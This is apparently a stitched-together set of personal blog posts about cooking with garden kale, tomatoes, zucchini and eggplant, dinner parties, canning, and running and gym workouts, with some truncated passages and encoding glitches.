In order to make sure that I am eating kale and veggies from the garden as much as possible, Â I really make sure to make my meal plan around what is growing. I love that RJ, loves kale (well blended in smoothies) because between the two of us we have put a little dent in it.
This week I will be making green monsters everyday, kale salads, kale chips, kale pesto, kale and white bean soup, kale omelets, and kale egg casserole.
I started the KALE KICK OFF with a yummy Kale and Quinoa Stir-Fry that I literally had everything already on hand for. I took Spicy Kale and Coconut Stir Fry from Cookie and Cake and mixed it up a bit. It was so simple and tasted amazing the only thing I regretted was not making more!

t believe how well it is doing this year. I have more produce than I know what to do with. I have been pinning stuff like crazy on Pinterest canning recipes. This weekend we will have a canning party with Newly Wife!
Last night I made the most amazing amazing homemade marinara sauce. Itâ€
s amazing how much sun-dried tomatoes make a difference in the sauce. Last week I baked some of our tomatoes in the oven with a drizzle of EVOO and garlic at 200 degrees in the oven for 3 hours. Then I added them to my sauce.

Directions:
I started with 2 huge tomatoes, 4 on-the-vine tomatoes, and about a cup of cherry tomatoes. They all got chopped up, briefly drained, and then added to a pan with some sauteed garlic.
After they cooked for about an hour and thickened quite a bit, I added the following:

Our first dinner party was an out door potluck. I brought my own MASSIVE salad beast and topped it with a quinoa salad my friend Melissa brought.
Saturday morning was kind of a blur!! Amy and I met up at the gym WAY to early for a Saturday, but did get in a great weight circuit.
Dinner party #2 was with my dear friend Susie. We haven’t been running together (sad day), we had a lot to catch up on!
Dinner was some fresh salmon with guac, grilled veggies (from the garden) and sweet potato fries <—-RANDOM I know.
Oh and our GARDEN is GROWING like crazy! We pretty much have a produce stand in our backyard.
Sunday morning I got up early and went to the newest, cutest little coffee shop in town. I decided to get my Sunday prep in before church as well as get in some of my Beth Moore Study (I am doing the study of David).
Came home and got dressed for church…went with the WHIMSICAL HIGH BUN! Need to a tutorial on this, so easy and so fun!
After church I made the biggest grilled veggie salad from leftovers. Grilled eggplant, tomatoes, bell pepper, zucchini and squash. With a little avocado and veganaise.
Amy and I have been getting in an AWESOME SWEATY workouts on Sunday afternoons, we call it ourSunday Sweat Session! In case your wondering I have no real training plan right now, except to enjoy EVERY workout get in weights three times a week, 2 runs, and maybe a long bike ride. I am just cruising, but I am sure there will be a race I sign up for soon!
Sunday night was dinner party #3, where I enjoyed some Cab! My parents always bring the best wine.
I made Tilapia tacos, black beans, and of course more grilled veggies. I make a super easy marinade. First chop of the veggies, throw in a big zip lick bag, throw in some EVOO + balsamic vinegar and a little salt and pepper. Shake it all up, throw it on the grill. SO GOOD!
We ended the night with a much cleaner cobbler then the last one I made!! Posting recipe tomorrow 
We all finished the evening catching up on the Olympics!

We hit the sack early and I got up this morning for an 8 mile SWEATY RUN with Val! It was 85 degrees by 7am! We made it and finished strong.
The rest of the day was all about prepping for the week and enjoying lots of delicious food of course 
I am loving the chalkboard menu I made last night with chalkboard spray paint!
I actually finished the laundry room door today as well
It’s the door we come in and out of everyday. I need to get better at writing with chalk. My hand writing looks like a 5 year old!
About half way through the day I hit the backyard and took a POOL break!!!! IT WAS 105!!!
Took a CHOBANI break too, yep Chobani is back in my life.
I also prepped food like crazy this evening. We have another dinner party tomorrow night (taking new parents food)….
Made a random dinner of leftovers and zucchini fritters! —>another recipe I will be posting this week.
I made this zucchini muffins for the co-workers tomorrow (sneaking in veggies at work). Follow the recipe, except used coconut oil.
Just when we thought the kitchen was closed we got word that it was National Root beer FLOAT day! Hubby was so sweet and ran out and got us some root beer so we could celebrate. I can’t tell you the last time I had one of these, man they are good!

We busted out the Riesling that we got while we were in Santa Barbara. It was sooooooo good!
Fresh & Easy is the best place to get things to grill! Their veggies go straight from the fridge to the grill.
I kinda took over the grill!! What can I say I love to cook 
Dinner was served by candlelight 
Surf and turf: Salmon + Adobe Steak + and Brian’s famous coleslaw with peanuts and cilantro!
The rest of the evening was filled with BASEBALL… of course!

Last week I canned tomatoes (one day I’ll write that how-to post on it). Tonight I put them to good use. I threw a can of fresh canned tomatoes into my lovely food processor along with fresh basil, sea salt, olive oil, fresh oregano and garlic. Pulsed it up….
It was a little watery because I didn’t squeeze all the juice out of the tomatoes before I canned them, so I added in a can of tomato paste while it cooked on the stove. It helped thicken it up.
It smelt amazing. The taste of fresh tomato sauce TOP any canned tomato sauce!
I also cooked up some of this HUGE zucchini squash!
I sautéed it up with some minced garlic, olive oil and sea salt.
While Hubby grilled up the eggplant, I boiled up some whole wheat pasta.
Viola! Heaven. I can not even try to explain to you how fresh and filling this was!
Here is a little 411 on the nutrition on Eggplant:
The good: very low in Saturated Fat, Cholesterol and Sodium. It is also a good source of Vitamin C, Vitamin K, Thiamin, Niacin, Vitamin B6, Pantothenic Acid, Magnesium, Phosphorus and Copper, and a very good source of Dietary Fiber, Folate, Potassium and Manganese.
The bad: A large portion of the calories in this food come from sugars.
I topped this amazing mess with fresh parm and ate every last veggie! I am going to be so sad when we don’t have eggplant and zucchini in our garden any more
I think I shall make this dinner every night this week 
Tonight I had my last “longish” run, 6 miles in the 95 degree heat was KILLER!!!! Thanks to Susie, I made it through 
I can’t believe my HIM is on Sunday less then 7 days away

Hub made some delish Parmesan chicken that I added to my bowl of fresh veggies, all on top of whole wheat elbow noodles!

Hubby made dinner!! Best part is it was full of veggies from our garden. Turkey burger + tomatoes, onions, and kale chips!
